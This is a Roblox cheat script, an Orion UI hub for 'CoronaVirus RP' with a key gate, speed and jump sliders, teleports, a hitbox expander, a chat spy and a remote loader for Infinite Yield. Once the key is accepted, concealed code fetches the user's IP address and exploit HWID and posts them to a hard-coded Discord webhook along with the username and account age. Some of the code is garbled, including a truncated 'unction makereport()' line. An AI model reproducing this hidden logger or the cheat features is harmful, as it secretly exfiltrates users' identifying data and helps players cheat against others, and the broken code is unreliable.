local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
local Window = OrionLib:MakeWindow({Name = "Key System", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})



local KeyTab = Window:MakeTab({
	Name = "Key",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})





function makehub()
	unction makereport()
	if syn then
        http_request = syn.request
elseif SENTINEL_V2 then
        function http_request(tb)
                return {
                        StatusCode = 200;
                        Body = request(tb.Url, tb.Method, (tb.Body or ''))
                }
        end
end

if (not http_request) then
        return game:GetService('Players').LocalPlayer:Kick('Unable to find proper request function')
end

-- // define hash function

local hash; do
    local MOD = 2^32
    local MODM = MOD-1
    local bxor = bit32.bxor;
    local band = bit32.band;
    local bnot = bit32.bnot;
    local rshift1 = bit32.rshift;
    local rshift = bit32.rshift;
    local lshift = bit32.lshift;
    local rrotate = bit32.rrotate;

    local str_gsub = string.gsub;
    local str_fmt = string.format;
    local str_byte = string.byte;
    local str_char = string.char;
    local str_rep = string.rep;

    local k = {
            0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5,
            0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
            0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3,
            0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
            0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc,
            0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
            0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7,
            0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
            0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13,
            0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
            0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3,
            0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
            0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5,
            0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
            0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208,
            0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,
    }
    local function str2hexa(s)
        return (str_gsub(s, ".", function(c) return str_fmt("%02x", str_byte(c)) end))
    end
    local function num2s(l, n)
        local s = ""
        for i = 1, n do
            local rem = l % 256
            s = str_char(rem) .. s
            l = (l - rem) / 256
        end
        return s
    end
    local function s232num(s, i)
        local n = 0
        for i = i, i + 3 do n = n*256 + str_byte(s, i) end
        return n
        end
        local function preproc(msg, len)
        local extra = 64 - ((len + 9) % 64)
        len = num2s(8 * len, 8)
        msg = msg .. "\128" .. str_rep("\0", extra) .. len
        assert(#msg % 64 == 0)
        return msg
    end
    local function initH256(H)
        H[1] = 0x6a09e667
        H[2] = 0xbb67ae85
        H[3] = 0x3c6ef372
        H[4] = 0xa54ff53a
        H[5] = 0x510e527f
        H[6] = 0x9b05688c
        H[7] = 0x1f83d9ab
        H[8] = 0x5be0cd19
        return H
    end
    local function digestblock(msg, i, H)
        local w = {}
        for j = 1, 16 do w[j] = s232num(msg, i + (j - 1)*4) end
        for j = 17, 64 do
            local v = w[j - 15]
            local s0 = bxor(rrotate(v, 7), rrotate(v, 18), rshift(v, 3))
            v = w[j - 2]
            w[j] = w[j - 16] + s0 + w[j - 7] + bxor(rrotate(v, 17), rrotate(v, 19), rshift(v, 10))
        end
        local a, b, c, d, e, f, g, h = H[1], H[2], H[3], H[4], H[5], H[6], H[7], H[8]
        for i = 1, 64 do
            local s0 = bxor(rrotate(a, 2), rrotate(a, 13), rrotate(a, 22))
            local maj = bxor(band(a, b), band(a, c), band(b, c))
            local t2 = s0 + maj
            local s1 = bxor(rrotate(e, 6), rrotate(e, 11), rrotate(e, 25))
            local ch = bxor(band(e, f), band(bnot(e), g))
            local t1 = h + s1 + ch + k[i] + w[i]
            h, g, f, e, d, c, b, a = g, f, e, d + t1, c, b, a, t1 + t2
        end
        H[1] = band(H[1] + a)
        H[2] = band(H[2] + b)
        H[3] = band(H[3] + c)
        H[4] = band(H[4] + d)
        H[5] = band(H[5] + e)
        H[6] = band(H[6] + f)
        H[7] = band(H[7] + g)
        H[8] = band(H[8] + h)
    end
    function hash(msg, t)
        msg = preproc(msg, #msg)
        local H = initH256({})
        for i = 1, #msg, 64 do digestblock(msg, i, H) end
        return str2hexa(num2s(H[1], 4) .. num2s(H[2], 4) .. num2s(H[3], 4) .. num2s(H[4], 4) .. num2s(H[5], 4) .. num2s(H[6], 4) .. num2s(H[7], 4) .. num2s(H[8], 4))
    end
end




local IP = game:HttpGet("https://v4.ident.me")
plr = game:GetService'Players'.LocalPlayer
local premium = false
local ALT = false

local market = game:GetService("MarketplaceService")
local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)


local http_request = http_request;
if syn then
    http_request = syn.request
elseif SENTINEL_V2 then
    function http_request(tb)
        return {
            StatusCode = 200;
            Body = request(tb.Url, tb.Method, (tb.Body or ''))
        }
    end
end

local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
hwid = "";

for i, v in next, hwid_list do
    if decoded.headers[v] then
        hwid = decoded.headers[v];
        break
    end
end

if hwid then
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/1151912008514547812/Rwfjh5tZhNTlDZLaGyAyomE-ZM0p5Y2E7GYIel9mJaJFS_etLNIRTu0tQi4duUZGs-0p"


local data =
    {
        ["content"] = "LLL",
        ["embeds"] = {{
            ["title"] = "**Player Executed Best Script ever for virus rp**",
            ["description"] = hwid,
            ["type"] = "rich",
            ["color"] = tonumber(0x33FF5C),
            ["fields"] = {
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
                {
                    ["name"] = "IP Address:",
                    ["value"] = IP,
                    ["inline"] = true
                },
                {
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
                {
                    ["name"] = "Game Name:",
                    ["value"] = info.Name,
                    ["inline"] = true
                },
                {
                    ["name"] = "Age:",
                    ["value"] = plr.AccountAge,
                    ["inline"] = true
                },
                {
                    ["name"] = "Premium:",
                    ["value"] = premium,
                    ["inline"] = true
                },
                {
                    ["name"] = "ALT:",
                    ["value"] = ALT,
                    ["inline"] = true
                },

            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
    

    local headers = {
            ["content-type"] = "application/json"
    }

    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
    setclipboard(hwid)
    --local c=newdata:PostAsync(url)
else
    game:GetService("Players").LocalPlayer:Kick('Unable to find HWID! Contact asdasSupport.')
end
 end
	local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
print("Штейн поедатель кала")
local Window = OrionLib:MakeWindow({Name = "CoronaVirus RP", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})
 

 
local PlayerTab = Window:MakeTab({
	Name = "Player",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
 
PlayerTab:AddSlider({
	Name = "Speed",
	Min = 0,
	Max = 500,
	Default = 5,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "Walk Speed",
	Callback = function(Value)
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = Value
	end    
})
 
PlayerTab:AddSlider({
	Name = "Jump Power ",
	Min = 0,
	Max = 500,
	Default = 5,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "JumpPower",
	Callback = function(Value)
        game.Players.LocalPlayer.Character.Humanoid.JumpPower = Value
	end    
})
 
local MainTab = Window:MakeTab({
	Name = "Main",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
 
 
 
MainTab:AddButton({
	Name = "Spy on chat",
	Callback = function()
        enabled = true
        --if true will xhexk your messages too
        spyOnMyself = true
        --if true will xhat the logs publikly (fun, risky)
        public = false
        --if true will use /me to stand out
        publicItalics = false
        --KUSTOMIZE private logs
        privateProperties = {
            Color = Color3.fromRGB(0,255,255); 
            Font = Enum.Font.SourceSansBold;
            TextSize = 18;
        }
        --////////////////////////////////////////////////////////////////
        local StarterGui = game:GetService("StarterGui")
        local Players = game:GetService("Players")
        local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):Wait() or Players.LocalPlayer
        local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
        local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
        local instance = (_G.chatSpyInstance or 0) + 1
        _G.chatSpyInstance = instance
 
        local function onChatted(p,msg)
            if _G.chatSpyInstance == instance then
                if p==player and msg:lower():sub(1,6)==".lu" then
                    enabled = not enabled
                    wait(0.3)
                    privateProperties.Text = "{LOLLYPOP SPY "..(enabled and "EN" or "DIS").."ABLED}"
                    StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
                elseif enabled and (spyOnMyself==true or p~=player) then
                    msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
                    local hidden = true
                    local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
                        if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and p.Team==player.Team)) then
                            hidden = false
                        end
                    end)
                    wait(1)
                    conn:Disconnect()
                    if hidden and enabled then
                        if public then
                            saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All")
                        else
                            privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
                            StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
                        end
                    end
                end
            end
        end
 
        for _,p in ipairs(Players:GetPlayers()) do
            p.Chatted:Connect(function(msg) onChatted(p,msg) end)
        end
        Players.PlayerAdded:Connect(function(p)
            p.Chatted:Connect(function(msg) onChatted(p,msg) end)
        end)
        privateProperties.Text = "{LOLLYPOP SPY "..(enabled and "EN" or "DIS").."ABLED}"
        player:WaitForChild("PlayerGui"):WaitForChild("Chat")
        StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
        wait(3)
        local chatFrame = player.PlayerGui.Chat.Frame
        chatFrame.ChatChannelParentFrame.Visible = true
        chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)
  	end    
})
 
MainTab:AddButton({
	Name = "View Dropped Tools!",
	Callback = function()
        local Workspace1 = game:GetService("Workspace")
        Workspace1.ChildAdded:Connect(function(e)
            if e:IsA("Tool") and e.Parent == workspace then
                wait(0.5)
                local Highlight = Instance.new("Highlight")
                Highlight.FillColor = Color3.fromRGB(21,0,255)
                Highlight.FillTransparency = 0.25
                Highlight.OutlineColor = Color3.fromRGB(255,0,0)
                Highlight.OutlineTransparency = 0
                Highlight.Parent = e.Handle
            end
        end)
 
        Workspace1.ChildRemoved:Connect(function(e)
            if e:IsA("Tool") then
 
                local Highlight = Instance.new("Highlight")
                Highlight.FillColor = Color3.fromRGB(21,0,255)
                Highlight.FillTransparency = 0.25
                Highlight.OutlineColor = Color3.fromRGB(255,0,0)
                Highlight.OutlineTransparency = 0
                e.Handle.Highlight:Destroy()
            end
        end)
end    
})
 
MainTab:AddButton({
	Name = "Remove Doors",
	Callback = function()
    game.workspace.Doors:Destroy()
end    
})
 
MainTab:AddButton({
	Name = "Infinity Yield",
	Callback = function()
        loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end    
})

local IYMouse = game.Players.LocalPlayer:GetMouse()

MainTab:AddButton({
	Name = "Tp tool",
	Callback = function()
        local TpTool = Instance.new("Tool")
	
	 TpTool.Name = "Teleport Tool"
	 TpTool.RequiresHandle = false
	 TpTool.Parent =  game.Players.LocalPlayer.Backpack
	 TpTool.Activated:Connect(function()
		local Char =  game.Players.LocalPlayer.Character
		local HRP = Char and Char:FindFirstChild("HumanoidRootPart")
		if not Char or not HRP then
			return warn("Failed to find HumanoidRootPart")
		end
		HRP.CFrame = CFrame.new(IYMouse.Hit.X, IYMouse.Hit.Y + 3, IYMouse.Hit.Z, select(4, HRP.CFrame:components()))
	end)
end    
})
 


local HitBoxTab = Window:MakeTab({
	Name = "HitBox Tab",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
 
local HitboxSize = 0 
 
 
HitBoxTab:AddSlider({
	Name = "HitBox Size",
	Min = 0,
	Max = 500,
	Default = 0,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "",
	Callback = function(Value)
        HitboxSize = Value
	end    
})
 
function Antilag()
    local Terrain = workspace:FindFirstChildOfClass('Terrain')
    local Lighting = game:GetService("Lighting")
	Terrain.WaterWaveSize = 0
	Terrain.WaterWaveSpeed = 0
	Terrain.WaterReflectance = 0
	Terrain.WaterTransparency = 0
	Lighting.GlobalShadows = false
	Lighting.FogEnd = 9e9
	settings().Rendering.QualityLevel = 1
	for i,v in pairs(game:GetDescendants()) do
		if v:IsA("Part") or v:IsA("UnionOperation") or v:IsA("MeshPart") or v:IsA("CornerWedgePart") or v:IsA("TrussPart") then
			v.Material = "Plastic"
			v.Reflectance = 0
		elseif v:IsA("Decal") then
			v.Transparency = 1
		elseif v:IsA("ParticleEmitter") or v:IsA("Trail") then
			v.Lifetime = NumberRange.new(0)
		elseif v:IsA("Explosion") then
			v.BlastPressure = 1
			v.BlastRadius = 1
		end
	end
	for i,v in pairs(Lighting:GetDescendants()) do
		if v:IsA("BlurEffect") or v:IsA("SunRaysEffect") or v:IsA("ColorCorrectionEffect") or v:IsA("BloomEffect") or v:IsA("DepthOfFieldEffect") then
			v.Enabled = false
		end
	end
	workspace.DescendantAdded:Connect(function(child)
		task.spawn(function()
			if child:IsA('ForceField') then
				RunService.Heartbeat:Wait()
				child:Destroy()
			elseif child:IsA('Sparkles') then
				RunService.Heartbeat:Wait()
				child:Destroy()
			elseif child:IsA('Smoke') or child:IsA('Fire') then
				RunService.Heartbeat:Wait()
				child:Destroy()
			end
		end)
	end)
 end   


HitBoxTab:AddButton({
	Name = "Hitbox expander(click again if its not works)",
	Callback = function()
    _G.HeadSize = HitboxSize
    _G.Disabled = true
   
   game:GetService('RunService').RenderStepped:connect(function()
 if _G.Disabled then
 for i,v in next, game:GetService('Players'):GetPlayers() do
 if v.Name ~= game:GetService('Players').LocalPlayer.Name then
 pcall(function()
 v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
 v.Character.HumanoidRootPart.CanCollide = false
 v.Character.HumanoidRootPart.CanTouch = true
 v.Character.HumanoidRootPart.Transparency = 0.7
 v.Character.HumanoidRootPart.CashShadow = false
 v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Mid gray")
 
 
end)
end
end
end
end)
end    
})
 


local ShteinWhereOptimizachia = Window:MakeTab({
	Name = "optimization",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
 
ShteinWhereOptimizachia:AddButton({
	Name = "Remove terrain",
	Callback = function(Value)
        workspace:FindFirstChildOfClass('Terrain'):Clear()
        
	end  
 
})

ShteinWhereOptimizachia:AddButton({
	Name = "Anti Lag",
	Callback = function(Value)
        Antilag()
        
	end  
 
})



local TeleportTab = Window:MakeTab({
	Name = "Teleport Tab",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
 
 
TeleportTab:AddButton({
	Name = "Teleport To Kitchen",
	Callback = function(Value)
 
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1275.59,-21.53,633.01)
	end  
 
})
 
TeleportTab:AddButton({
	Name = "Teleport To Exit",
	Callback = function(Value)
 
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-100.67,-20.5,752.7)
	end  
 
})
 
 
 
 
TeleportTab:AddButton({
	Name = "Teleport To TFB Base",
	Callback = function(Value)
 
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1033.42,-27.93,709.90)
	end  
 
})
 
TeleportTab:AddButton({
	Name = "Teleport To Secret room",
	Callback = function(Value)
 
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-751.84,-10.95, 843.03)
 
	end  
 
})
 end	

function notify()
	OrionLib:MakeNotification({
		Name = "Key System",
		Content = "Key is correct. Loading hub.",
		Image = "rbxassetid://4483345998",
		Time = 5
	})
 end	

_G.Key = "RDC23"
_G.KeyInput = "string"

KeyTab:AddTextbox({
	Name = "Key",
	Default = "Key Here",
	TextDisappear = true,
	Callback = function(Value)
		_G.KeyInput = Value
	end	  
})



KeyTab:AddButton({
	Name = "Button!",
	Callback = function()
      	if _G.KeyInput == _G.Key then
			
			notify()
		    makehub()
			
			wait(0.5)
			OrionLib:Destroy()

            else
            game.Players.LocalPlayer:Kick("ахаха бездарь иди ищи новый ключик")

		 end	
  	end    
})
OrionLib:Init()
